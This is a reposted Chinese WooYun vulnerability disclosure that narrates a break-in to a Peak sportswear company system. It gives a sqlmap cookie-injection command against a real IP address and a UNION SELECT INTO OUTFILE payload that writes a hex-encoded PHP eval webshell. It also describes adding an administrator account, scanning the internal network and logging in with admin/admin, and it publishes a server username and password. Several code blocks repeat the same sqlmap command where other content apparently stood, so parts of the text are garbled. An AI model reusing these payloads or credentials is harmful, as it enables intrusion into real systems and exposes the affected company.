神刀安全网

漏洞标题: 匹克某系统getshell(一次成功的内网漫游/成功getshell某系统)

漏洞详情

披露状态:

2016-04-06: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

20

详细说明:

code 区域
http://218.5.173.228:90/CmxDownload.php

可以看到,这是科迈RAS系统

可以找乌云的案例,有许多处的sql注入

先来个cookie的sql注入

code 区域
C:/Python27/sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql

漏洞标题:  匹克某系统getshell(一次成功的内网漫游/成功getshell某系统)

直接getshell吧

code 区域
http://*******/bugs/wooyun-2010-0130866

前辈的文章。在cookie处加入'即可获得绝对路径

漏洞标题:  匹克某系统getshell(一次成功的内网漫游/成功getshell某系统)

code 区域
C:/Program Files (x86)/Comexe/RasMini/rasweb/Apache2/htdocs/Smarty-2.6.19/Client/

绝对路径

getshell

code 区域
RAS_UserInfo_UserName=wooyun' and 1=2 union select 0x776F6F79756E3C3F70687020706870696E666F28293B3F3E into outfile 'C:/Program Files (x86)/Comexe/RasMini/rasweb/Apache2/htdocs/smarty-2.6.19/Client/wooyun.php'%23

可以看到前辈的这段代码是把

code 区域
0x776F6F79756E3C3F70687020706870696E666F28293B3F3E

这段代码写到Client/wooyun.php里

利用了hex加密,把0x去掉解密可以看到是wooyun<?php phpinfo();?>

漏洞标题:  匹克某系统getshell(一次成功的内网漫游/成功getshell某系统)

成功写入

在把

code 区域
wooyun<?php @eval($_POST[wooyun]);?>

用hex加密

得到

code 区域
0x776f6f79756e3c3f70687020406576616c28245f504f53545b776f6f79756e5d293b3f3e

直接干~~

成功写入 密码wooyun

code 区域
218.5.173.228:90/Client/wooyun2.php

漏洞标题:  匹克某系统getshell(一次成功的内网漫游/成功getshell某系统)

cmd查看下权限

漏洞标题:  匹克某系统getshell(一次成功的内网漫游/成功getshell某系统)

sy权限,直接添加管理员找端口,端口91.

成功进入

漏洞标题:  匹克某系统getshell(一次成功的内网漫游/成功getshell某系统)

开启扫描器一顿扫射内网

发现了个

code 区域
http://10.0.10.38

漏洞标题:  匹克某系统getshell(一次成功的内网漫游/成功getshell某系统)

世纪互联CactiEZ的cms。直接getshell

code 区域
C:/Python27/sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql

0

直接访问,

code 区域
C:/Python27/sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql

1

密码0

不知道为什么,服务器连接不上一句话。这很是费解

code 区域
C:/Python27/sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql

2

又找了找 找到了这个

弱口令admin/admin

漏洞标题:  匹克某系统getshell(一次成功的内网漫游/成功getshell某系统)

成功进入。

还有一个很奇怪的现象。

我发现许多内部系统连接的都是我上个sql注入

code 区域
C:/Python27/sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql

3

code 区域
C:/Python27/sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql

4

随便点个公告都会跳到http://info.peaksport.com/

里面应该会有管理员的帐号吧。不深入了

服务器帐号sea$密码sea

漏洞证明:

漏洞标题:  匹克某系统getshell(一次成功的内网漫游/成功getshell某系统)

修复方案:

版权声明:转载请注明来源 DeadSea@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 匹克某系统getshell(一次成功的内网漫游/成功getshell某系统)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮